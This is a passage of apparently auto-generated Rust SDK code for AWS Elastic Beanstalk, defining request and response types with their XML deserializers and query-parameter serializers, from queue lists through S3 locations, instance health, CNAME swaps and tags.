DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } pub type QueueList = Vec<Queue>; struct QueueListDeserializer; impl QueueListDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<QueueList, XmlParseError> { let mut obj = vec![]; try!(start_element(tag_name, stack)); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { if name == "member" { obj.push(try!(QueueDeserializer::deserialize("member", stack))); } else { skip_tree(stack); } }, DeserializerNext::Close => { try!(end_element(tag_name, stack)); break; } DeserializerNext::Skip => { stack.next(); }, } } Ok(obj) } } #[doc="<p/>"] #[derive(Default,Debug,Clone)] pub struct RebuildEnvironmentMessage { #[doc="<p>The ID of the environment to rebuild.</p> <p> Condition: You must specify either this or an EnvironmentName, or both. If you do not specify either, AWS Elastic Beanstalk returns <code>MissingRequiredParameter</code> error. </p>"] pub environment_id: Option<EnvironmentId>, #[doc="<p>The name of the environment to rebuild.</p> <p> Condition: You must specify either this or an EnvironmentId, or both. If you do not specify either, AWS Elastic Beanstalk returns <code>MissingRequiredParameter</code> error. </p>"] pub environment_name: Option<EnvironmentName>, } /// Serialize `RebuildEnvironmentMessage` contents to a `SignedRequest`. 
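/// Per the field docs above, at least one of `EnvironmentId` and `EnvironmentName` must
/// be supplied; the serializer does not enforce this and simply omits `None` fields.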
struct RebuildEnvironmentMessageSerializer; impl RebuildEnvironmentMessageSerializer { fn serialize(params: &mut Params, name: &str, obj: &RebuildEnvironmentMessage) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } if let Some(ref field_value) = obj.environment_id { params.put(&format!("{}{}", prefix, "EnvironmentId"), &field_value); } if let Some(ref field_value) = obj.environment_name { params.put(&format!("{}{}", prefix, "EnvironmentName"), &field_value); } } } pub type RefreshedAt = String; struct RefreshedAtDeserializer; impl RefreshedAtDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<RefreshedAt, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type RegexLabel = String; struct RegexLabelDeserializer; impl RegexLabelDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<RegexLabel, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type RegexPattern = String; struct RegexPatternDeserializer; impl RegexPatternDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<RegexPattern, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type RequestCount = i64; struct RequestCountDeserializer; impl RequestCountDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<RequestCount, XmlParseError> { try!(start_element(tag_name, stack)); let obj = i64::from_str(try!(characters(stack)).as_ref()).unwrap(); try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Request to retrieve logs from an environment and store them in your Elastic Beanstalk storage bucket.</p>"] #[derive(Default,Debug,Clone)] pub struct RequestEnvironmentInfoMessage { #[doc="<p>The ID of the environment of the requested data.</p> <p>If no such environment is found, <code>RequestEnvironmentInfo</code> returns an <code>InvalidParameterValue</code> error. </p> <p>Condition: You must specify either this or an EnvironmentName, or both. If you do not specify either, AWS Elastic Beanstalk returns <code>MissingRequiredParameter</code> error. </p>"] pub environment_id: Option<EnvironmentId>, #[doc="<p>The name of the environment of the requested data.</p> <p>If no such environment is found, <code>RequestEnvironmentInfo</code> returns an <code>InvalidParameterValue</code> error. </p> <p>Condition: You must specify either this or an EnvironmentId, or both. If you do not specify either, AWS Elastic Beanstalk returns <code>MissingRequiredParameter</code> error. </p>"] pub environment_name: Option<EnvironmentName>, #[doc="<p>The type of information to request.</p>"] pub info_type: EnvironmentInfoType, } /// Serialize `RequestEnvironmentInfoMessage` contents to a `SignedRequest`. 
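/// `InfoType` is required and always written. A minimal caller-side sketch, assuming the
/// empty prefix that the generated client passes in; the environment name is hypothetical
/// and `"tail"`/`"bundle"` are the values the Elastic Beanstalk API accepts:
///
/// ```rust,ignore
/// let msg = RequestEnvironmentInfoMessage {
///     environment_name: Some("my-env".to_string()), // hypothetical name
///     info_type: "tail".to_string(),
///     ..Default::default()
/// };
/// let mut params = Params::new();
/// RequestEnvironmentInfoMessageSerializer::serialize(&mut params, "", &msg);
/// // params now holds EnvironmentName=my-env and InfoType=tail
/// ```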
struct RequestEnvironmentInfoMessageSerializer; impl RequestEnvironmentInfoMessageSerializer { fn serialize(params: &mut Params, name: &str, obj: &RequestEnvironmentInfoMessage) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } if let Some(ref field_value) = obj.environment_id { params.put(&format!("{}{}", prefix, "EnvironmentId"), &field_value); } if let Some(ref field_value) = obj.environment_name { params.put(&format!("{}{}", prefix, "EnvironmentName"), &field_value); } params.put(&format!("{}{}", prefix, "InfoType"), &obj.info_type); } } pub type RequestId = String; struct RequestIdDeserializer; impl RequestIdDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<RequestId, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type ResourceId = String; struct ResourceIdDeserializer; impl ResourceIdDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ResourceId, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type ResourceName = String; struct ResourceNameDeserializer; impl ResourceNameDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ResourceName, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p/>"] #[derive(Default,Debug,Clone)] pub struct RestartAppServerMessage { #[doc="<p>The ID of the environment to restart the server for.</p> <p> Condition: You must specify either this or an EnvironmentName, or both. If you do not specify either, AWS Elastic Beanstalk returns <code>MissingRequiredParameter</code> error. </p>"] pub environment_id: Option<EnvironmentId>, #[doc="<p>The name of the environment to restart the server for.</p> <p> Condition: You must specify either this or an EnvironmentId, or both. If you do not specify either, AWS Elastic Beanstalk returns <code>MissingRequiredParameter</code> error. </p>"] pub environment_name: Option<EnvironmentName>, } /// Serialize `RestartAppServerMessage` contents to a `SignedRequest`. struct RestartAppServerMessageSerializer; impl RestartAppServerMessageSerializer { fn serialize(params: &mut Params, name: &str, obj: &RestartAppServerMessage) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } if let Some(ref field_value) = obj.environment_id { params.put(&format!("{}{}", prefix, "EnvironmentId"), &field_value); } if let Some(ref field_value) = obj.environment_name { params.put(&format!("{}{}", prefix, "EnvironmentName"), &field_value); } } } #[doc="<p>Request to download logs retrieved with <a>RequestEnvironmentInfo</a>.</p>"] #[derive(Default,Debug,Clone)] pub struct RetrieveEnvironmentInfoMessage { #[doc="<p>The ID of the data's environment.</p> <p>If no such environment is found, returns an <code>InvalidParameterValue</code> error.</p> <p>Condition: You must specify either this or an EnvironmentName, or both. If you do not specify either, AWS Elastic Beanstalk returns <code>MissingRequiredParameter</code> error.</p>"] pub environment_id: Option<EnvironmentId>, #[doc="<p>The name of the data's environment.</p> <p> If no such environment is found, returns an <code>InvalidParameterValue</code> error. 
</p> <p> Condition: You must specify either this or an EnvironmentId, or both. If you do not specify either, AWS Elastic Beanstalk returns <code>MissingRequiredParameter</code> error. </p>"] pub environment_name: Option<EnvironmentName>, #[doc="<p>The type of information to retrieve.</p>"] pub info_type: EnvironmentInfoType, } /// Serialize `RetrieveEnvironmentInfoMessage` contents to a `SignedRequest`. struct RetrieveEnvironmentInfoMessageSerializer; impl RetrieveEnvironmentInfoMessageSerializer { fn serialize(params: &mut Params, name: &str, obj: &RetrieveEnvironmentInfoMessage) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } if let Some(ref field_value) = obj.environment_id { params.put(&format!("{}{}", prefix, "EnvironmentId"), &field_value); } if let Some(ref field_value) = obj.environment_name { params.put(&format!("{}{}", prefix, "EnvironmentName"), &field_value); } params.put(&format!("{}{}", prefix, "InfoType"), &obj.info_type); } } #[doc="<p>Result message containing a description of the requested environment info.</p>"] #[derive(Default,Debug,Clone)] pub struct RetrieveEnvironmentInfoResultMessage { #[doc="<p> The <a>EnvironmentInfoDescription</a> of the environment. </p>"] pub environment_info: Option<EnvironmentInfoDescriptionList>, } struct RetrieveEnvironmentInfoResultMessageDeserializer; impl RetrieveEnvironmentInfoResultMessageDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<RetrieveEnvironmentInfoResultMessage, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = RetrieveEnvironmentInfoResultMessage::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] 
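// The result shape wraps a single list field, so only EnvironmentInfo is matched here.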
{ "EnvironmentInfo" => { obj.environment_info = Some(try!(EnvironmentInfoDescriptionListDeserializer::deserialize("EnvironmentInfo", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } pub type S3Bucket = String; struct S3BucketDeserializer; impl S3BucketDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<S3Bucket, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type S3Key = String; struct S3KeyDeserializer; impl S3KeyDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<S3Key, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>The bucket and key of an item stored in Amazon S3.</p>"] #[derive(Default,Debug,Clone)] pub struct S3Location { #[doc="<p>The Amazon S3 bucket where the data is located.</p>"] pub s3_bucket: Option<S3Bucket>, #[doc="<p>The Amazon S3 key where the data is located.</p>"] pub s3_key: Option<S3Key>, } struct S3LocationDeserializer; impl S3LocationDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<S3Location, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = S3Location::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "S3Bucket" => { obj.s3_bucket = Some(try!(S3BucketDeserializer::deserialize("S3Bucket", stack))); } "S3Key" => { obj.s3_key = Some(try!(S3KeyDeserializer::deserialize("S3Key", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } /// Serialize `S3Location` contents to a `SignedRequest`. 
struct S3LocationSerializer; impl S3LocationSerializer { fn serialize(params: &mut Params, name: &str, obj: &S3Location) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } if let Some(ref field_value) = obj.s3_bucket { params.put(&format!("{}{}", prefix, "S3Bucket"), &field_value); } if let Some(ref field_value) = obj.s3_key { params.put(&format!("{}{}", prefix, "S3Key"), &field_value); } } } pub type SampleTimestamp = String; struct SampleTimestampDeserializer; impl SampleTimestampDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<SampleTimestamp, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Detailed health information about an Amazon EC2 instance in your Elastic Beanstalk environment.</p>"] #[derive(Default,Debug,Clone)] pub struct SingleInstanceHealth { #[doc="<p>Request metrics from your application.</p>"] pub application_metrics: Option<ApplicationMetrics>, #[doc="<p>The availability zone in which the instance runs.</p>"] pub availability_zone: Option<String>, #[doc="<p>Represents the causes, which provide more information about the current health status.</p>"] pub causes: Option<Causes>, #[doc="<p>Represents the color indicator that gives you information about the health of the EC2 instance. For more information, see <a href=\"http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/health-enhanced-status.html\">Health Colors and Statuses</a>.</p>"] pub color: Option<String>, #[doc="<p>Information about the most recent deployment to an instance.</p>"] pub deployment: Option<Deployment>, #[doc="<p>Returns the health status of the specified instance. For more information, see <a href=\"http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/health-enhanced-status.html\">Health Colors and Statuses</a>.</p>"] pub health_status: Option<String>, #[doc="<p>The ID of the Amazon EC2 instance.</p>"] pub instance_id: Option<InstanceId>, #[doc="<p>The instance's type.</p>"] pub instance_type: Option<String>, #[doc="<p>The time at which the EC2 instance was launched.</p>"] pub launched_at: Option<LaunchedAt>, #[doc="<p>Operating system metrics from the instance.</p>"] pub system: Option<SystemStatus>, } struct SingleInstanceHealthDeserializer; impl SingleInstanceHealthDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<SingleInstanceHealth, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = SingleInstanceHealth::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] 
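// One arm per field of SingleInstanceHealth; nested shapes (ApplicationMetrics,
// Deployment, Causes, SystemStatus) recurse into their own deserializers.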
{ "ApplicationMetrics" => { obj.application_metrics = Some(try!(ApplicationMetricsDeserializer::deserialize("ApplicationMetrics", stack))); } "AvailabilityZone" => { obj.availability_zone = Some(try!(StringDeserializer::deserialize("AvailabilityZone", stack))); } "Causes" => { obj.causes = Some(try!(CausesDeserializer::deserialize("Causes", stack))); } "Color" => { obj.color = Some(try!(StringDeserializer::deserialize("Color", stack))); } "Deployment" => { obj.deployment = Some(try!(DeploymentDeserializer::deserialize("Deployment", stack))); } "HealthStatus" => { obj.health_status = Some(try!(StringDeserializer::deserialize("HealthStatus", stack))); } "InstanceId" => { obj.instance_id = Some(try!(InstanceIdDeserializer::deserialize("InstanceId", stack))); } "InstanceType" => { obj.instance_type = Some(try!(StringDeserializer::deserialize("InstanceType", stack))); } "LaunchedAt" => { obj.launched_at = Some(try!(LaunchedAtDeserializer::deserialize("LaunchedAt", stack))); } "System" => { obj.system = Some(try!(SystemStatusDeserializer::deserialize("System", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Describes the solution stack.</p>"] #[derive(Default,Debug,Clone)] pub struct SolutionStackDescription { #[doc="<p>The permitted file types allowed for a solution stack.</p>"] pub permitted_file_types: Option<SolutionStackFileTypeList>, #[doc="<p>The name of the solution stack.</p>"] pub solution_stack_name: Option<SolutionStackName>, } struct SolutionStackDescriptionDeserializer; impl SolutionStackDescriptionDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<SolutionStackDescription, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = SolutionStackDescription::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "PermittedFileTypes" => { obj.permitted_file_types = Some(try!(SolutionStackFileTypeListDeserializer::deserialize("PermittedFileTypes", stack))); } "SolutionStackName" => { obj.solution_stack_name = Some(try!(SolutionStackNameDeserializer::deserialize("SolutionStackName", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } pub type SolutionStackFileTypeList = Vec<FileTypeExtension>; struct SolutionStackFileTypeListDeserializer; impl SolutionStackFileTypeListDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<SolutionStackFileTypeList, XmlParseError> { let mut obj = vec![]; try!(start_element(tag_name, stack)); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. 
})) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { if name == "member" { obj.push(try!(FileTypeExtensionDeserializer::deserialize("member", stack))); } else { skip_tree(stack); } }, DeserializerNext::Close => { try!(end_element(tag_name, stack)); break; } DeserializerNext::Skip => { stack.next(); }, } } Ok(obj) } } pub type SolutionStackName = String; struct SolutionStackNameDeserializer; impl SolutionStackNameDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<SolutionStackName, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Location of the source code for an application version.</p>"] #[derive(Default,Debug,Clone)] pub struct SourceBuildInformation { #[doc="<p>The location of the source code, as a formatted string, depending on the value of <code>SourceRepository</code> </p> <ul> <li> <p>For <code>CodeCommit</code>, the format is the repository name and commit ID, separated by a forward slash. For example, <code>my-git-repo/265cfa0cf6af46153527f55d6503ec030551f57a</code>.</p> </li> <li> <p>For <code>S3</code>, the format is the S3 bucket name and object key, separated by a forward slash. For example, <code>my-s3-bucket/Folders/my-source-file</code>.</p> </li> </ul>"] pub source_location: SourceLocation, #[doc="<p>Location where the repository is stored.</p> <ul> <li> <p> <code>CodeCommit</code> </p> </li> <li> <p> <code>S3</code> </p> </li> </ul>"] pub source_repository: SourceRepository, #[doc="<p>The type of repository.</p> <ul> <li> <p> <code>Git</code> </p> </li> <li> <p> <code>Zip</code> </p> </li> </ul>"] pub source_type: SourceType, } struct SourceBuildInformationDeserializer; impl SourceBuildInformationDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<SourceBuildInformation, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = SourceBuildInformation::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "SourceLocation" => { obj.source_location = try!(SourceLocationDeserializer::deserialize("SourceLocation", stack)); } "SourceRepository" => { obj.source_repository = try!(SourceRepositoryDeserializer::deserialize("SourceRepository", stack)); } "SourceType" => { obj.source_type = try!(SourceTypeDeserializer::deserialize("SourceType", stack)); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } /// Serialize `SourceBuildInformation` contents to a `SignedRequest`. 
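/// A sketch of the resulting wire form, using the sample values from the field docs above
/// and a hypothetical prefix of `SourceBuildInformation` (the prefix is the caller's choice):
///
/// ```rust,ignore
/// let info = SourceBuildInformation {
///     source_location: "my-git-repo/265cfa0cf6af46153527f55d6503ec030551f57a".to_string(),
///     source_repository: "CodeCommit".to_string(),
///     source_type: "Git".to_string(),
/// };
/// let mut params = Params::new();
/// SourceBuildInformationSerializer::serialize(&mut params, "SourceBuildInformation", &info);
/// // SourceBuildInformation.SourceLocation=my-git-repo/265cfa0cf6af46153527f55d6503ec030551f57a
/// // SourceBuildInformation.SourceRepository=CodeCommit
/// // SourceBuildInformation.SourceType=Git
/// ```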
struct SourceBuildInformationSerializer; impl SourceBuildInformationSerializer { fn serialize(params: &mut Params, name: &str, obj: &SourceBuildInformation) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } params.put(&format!("{}{}", prefix, "SourceLocation"), &obj.source_location); params.put(&format!("{}{}", prefix, "SourceRepository"), &obj.source_repository); params.put(&format!("{}{}", prefix, "SourceType"), &obj.source_type); } } #[doc="<p>A specification for an environment configuration</p>"] #[derive(Default,Debug,Clone)] pub struct SourceConfiguration { #[doc="<p>The name of the application associated with the configuration.</p>"] pub application_name: Option<ApplicationName>, #[doc="<p>The name of the configuration template.</p>"] pub template_name: Option<ConfigurationTemplateName>, } /// Serialize `SourceConfiguration` contents to a `SignedRequest`. struct SourceConfigurationSerializer; impl SourceConfigurationSerializer { fn serialize(params: &mut Params, name: &str, obj: &SourceConfiguration) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } if let Some(ref field_value) = obj.application_name { params.put(&format!("{}{}", prefix, "ApplicationName"), &field_value); } if let Some(ref field_value) = obj.template_name { params.put(&format!("{}{}", prefix, "TemplateName"), &field_value); } } } pub type SourceLocation = String; struct SourceLocationDeserializer; impl SourceLocationDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<SourceLocation, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type SourceRepository = String; struct SourceRepositoryDeserializer; impl SourceRepositoryDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<SourceRepository, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type SourceType = String; struct SourceTypeDeserializer; impl SourceTypeDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<SourceType, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Represents the percentage of requests over the last 10 seconds that resulted in each type of status code response. For more information, see <a href=\"http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html\">Status Code Definitions</a>.</p>"] #[derive(Default,Debug,Clone)] pub struct StatusCodes { #[doc="<p>The percentage of requests over the last 10 seconds that resulted in a 2xx (200, 201, etc.) status code.</p>"] pub status_2xx: Option<NullableInteger>, #[doc="<p>The percentage of requests over the last 10 seconds that resulted in a 3xx (300, 301, etc.) status code.</p>"] pub status_3xx: Option<NullableInteger>, #[doc="<p>The percentage of requests over the last 10 seconds that resulted in a 4xx (400, 401, etc.) status code.</p>"] pub status_4xx: Option<NullableInteger>, #[doc="<p>The percentage of requests over the last 10 seconds that resulted in a 5xx (500, 501, etc.) 
status code.</p>"] pub status_5xx: Option<NullableInteger>, } struct StatusCodesDeserializer; impl StatusCodesDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<StatusCodes, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = StatusCodes::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "Status2xx" => { obj.status_2xx = Some(try!(NullableIntegerDeserializer::deserialize("Status2xx", stack))); } "Status3xx" => { obj.status_3xx = Some(try!(NullableIntegerDeserializer::deserialize("Status3xx", stack))); } "Status4xx" => { obj.status_4xx = Some(try!(NullableIntegerDeserializer::deserialize("Status4xx", stack))); } "Status5xx" => { obj.status_5xx = Some(try!(NullableIntegerDeserializer::deserialize("Status5xx", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } struct StringDeserializer; impl StringDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<String, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Swaps the CNAMEs of two environments.</p>"] #[derive(Default,Debug,Clone)] pub struct SwapEnvironmentCNAMEsMessage { #[doc="<p>The ID of the destination environment.</p> <p> Condition: You must specify at least the <code>DestinationEnvironmentID</code> or the <code>DestinationEnvironmentName</code>. You may also specify both. You must specify the <code>SourceEnvironmentId</code> with the <code>DestinationEnvironmentId</code>. </p>"] pub destination_environment_id: Option<EnvironmentId>, #[doc="<p>The name of the destination environment.</p> <p> Condition: You must specify at least the <code>DestinationEnvironmentID</code> or the <code>DestinationEnvironmentName</code>. You may also specify both. You must specify the <code>SourceEnvironmentName</code> with the <code>DestinationEnvironmentName</code>. </p>"] pub destination_environment_name: Option<EnvironmentName>, #[doc="<p>The ID of the source environment.</p> <p> Condition: You must specify at least the <code>SourceEnvironmentID</code> or the <code>SourceEnvironmentName</code>. You may also specify both. If you specify the <code>SourceEnvironmentId</code>, you must specify the <code>DestinationEnvironmentId</code>. </p>"] pub source_environment_id: Option<EnvironmentId>, #[doc="<p>The name of the source environment.</p> <p> Condition: You must specify at least the <code>SourceEnvironmentID</code> or the <code>SourceEnvironmentName</code>. You may also specify both. If you specify the <code>SourceEnvironmentName</code>, you must specify the <code>DestinationEnvironmentName</code>. </p>"] pub source_environment_name: Option<EnvironmentName>, } /// Serialize `SwapEnvironmentCNAMEsMessage` contents to a `SignedRequest`. 
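/// All four fields are optional to the serializer, which writes whichever are `Some`;
/// the pairing rules in the field docs (IDs with IDs, names with names) are enforced by
/// the service, not here.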
struct SwapEnvironmentCNAMEsMessageSerializer; impl SwapEnvironmentCNAMEsMessageSerializer { fn serialize(params: &mut Params, name: &str, obj: &SwapEnvironmentCNAMEsMessage) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } if let Some(ref field_value) = obj.destination_environment_id { params.put(&format!("{}{}", prefix, "DestinationEnvironmentId"), &field_value); } if let Some(ref field_value) = obj.destination_environment_name { params.put(&format!("{}{}", prefix, "DestinationEnvironmentName"), &field_value); } if let Some(ref field_value) = obj.source_environment_id { params.put(&format!("{}{}", prefix, "SourceEnvironmentId"), &field_value); } if let Some(ref field_value) = obj.source_environment_name { params.put(&format!("{}{}", prefix, "SourceEnvironmentName"), &field_value); } } } #[doc="<p>CPU utilization and load average metrics for an Amazon EC2 instance.</p>"] #[derive(Default,Debug,Clone)] pub struct SystemStatus { #[doc="<p>CPU utilization metrics for the instance.</p>"] pub cpu_utilization: Option<CPUUtilization>, #[doc="<p>Load average in the last 1-minute and 5-minute periods. For more information, see <a href=\"http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/health-enhanced-metrics.html#health-enhanced-metrics-os\">Operating System Metrics</a>.</p>"] pub load_average: Option<LoadAverage>, } struct SystemStatusDeserializer; impl SystemStatusDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<SystemStatus, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = SystemStatus::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "CPUUtilization" => { obj.cpu_utilization = Some(try!(CPUUtilizationDeserializer::deserialize("CPUUtilization", stack))); } "LoadAverage" => { obj.load_average = Some(try!(LoadAverageDeserializer::deserialize("LoadAverage", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Describes a tag applied to a resource in an environment.</p>"] #[derive(Default,Debug,Clone)] pub struct Tag { #[doc="<p>The key of the tag.</p>"] pub key: Option<TagKey>, #[doc="<p>The value of the tag.</p>"] pub value: Option<TagValue>, } /// Serialize `Tag` contents to a `SignedRequest`. struct TagSerializer; impl TagSerializer { fn serialize(params: &mut Params, name: &str, obj: &Tag) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } if let Some(ref field_value) = obj.key { params.put(&format!("{}{}", prefix, "Key"), &field_value); } if let Some(ref field_value) = obj.value { params.put(&format!("{}{}", prefix, "Value"), &field_value); } } } pub type TagKey = String; pub type TagValue = String; pub type Tags = Vec<Tag>; /// Serialize `Tags` contents to a `SignedRequest`. 
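/// The first tag in a list named `Tags` becomes `Tags.member.1.Key` and
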